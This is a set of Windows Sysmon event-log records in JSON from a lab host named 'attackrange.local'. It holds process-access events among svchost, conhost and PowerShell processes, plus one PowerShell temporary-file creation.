{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5230,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5231,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44883363)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44883363)","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.547\r\nProcessGuid: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nProcessId: 4996\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ip3waneb.52m.ps1\r\nCreationUtcTime: 2020-08-01 05:52:44.547","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.547","ProcessGuid":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ip3waneb.52m.ps1","CreationUtcTime":"2020-08-01 05:52:44.547","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
